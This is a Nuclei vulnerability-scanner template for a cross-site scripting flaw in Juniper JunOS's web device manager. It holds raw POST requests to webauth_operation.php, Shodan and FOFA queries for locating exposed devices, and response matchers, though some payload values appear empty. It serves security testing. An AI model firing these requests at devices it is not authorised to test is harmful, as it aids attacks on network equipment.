id: junos-xss info: name: JunOS - Cross-Site Scripting author: DhiyaneshDK severity: medium reference: - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/ metadata: verified: true max-request: 2 shodan-query: title:"Juniper Web Device Manager" fofa-query: title="Juniper Web Device Manager" tags: junos,xss variables: string: "{{to_lower(rand_base(2))}}" http: - raw: - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=emit_debug_note&rsargs[]={{string}}&rsargs[]= - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=sajax_show_one_stub&rsargs[]={{string}} stop-at-first-match: true matchers-condition: or matchers: - type: word name: emit-debug-note-xss words: - "ERROR: " - "monospace" condition: and - type: word name: sajax-show-one-stub-xss words: - "" - "wrapper for" condition: and # digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950